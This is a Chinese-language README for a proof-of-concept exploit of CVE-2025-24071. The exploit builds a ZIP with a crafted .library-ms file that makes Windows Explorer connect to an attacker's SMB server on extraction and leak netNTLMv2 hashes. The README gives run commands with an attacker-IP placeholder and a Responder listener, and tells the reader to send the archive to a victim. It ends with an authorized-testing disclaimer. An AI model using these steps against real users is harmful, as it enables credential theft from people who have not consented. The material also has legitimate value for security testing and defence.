此 Python 脚本旨在演示 Windows 资源管理器中的 CVE-2025-24071 漏洞。该漏洞允许攻击者无需受害者直接交互即可捕获受害者的 netNTLMv2 凭据。
CVE-2025-24071 漏洞存在于 Windows 处理 ZIP 压缩包内 .library-ms 文件的方式中。当提取包含恶意 .library-ms 文件的 ZIP 文件时,Windows 会自动尝试访问该文件中指定的 SMB 位置,这可能导致受害者的凭据暴露给攻击者的服务器。
此脚本生成一个包含恶意 .library-ms 文件的 ZIP 文件。当受害者提取该 ZIP 文件时,系统会自动尝试连接到文件中指定的 SMB 位置,无需受害者任何交互即可将 netNTLMv2 凭据发送给攻击者。
脚本将攻击者 IP 地址作为参数,并将其插入到定义 .library-ms 文件的 XML 文件中。该文件指示 Windows 连接到攻击者 IP 地址处的共享资源。
然后将 .library-ms 文件放入名为 exploit.zip 的 ZIP 文件中。
当受害者提取 ZIP 文件时,Windows 处理 .library-ms 文件,并由于该漏洞自动建立到攻击者服务器的 SMB 连接。
攻击者可以使用 Responder 等工具捕获 netNTLMv2 凭据,而受害者无需采取任何行动。
zipfile、os、argparsepython exploit.py --ip <ATTACKER_IP>
responder -I <INTERFACE>
将生成的 exploit.zip 文件发送给受害者。当他们提取该文件时,Windows 将尝试连接到 .library-ms 文件中指定的 SMB 服务器。
一旦受害者提取了 ZIP 文件并且 Windows 尝试进行 SMB 连接,Responder 将从受害者处捕获 netNTLMv2 哈希值。
此脚本旨在用于受控环境中的教育和测试目的。恶意利用此漏洞可能违反许多国家的法律法规。请仅在您拥有审计权限的系统上使用此脚本,并始终获得适当授权。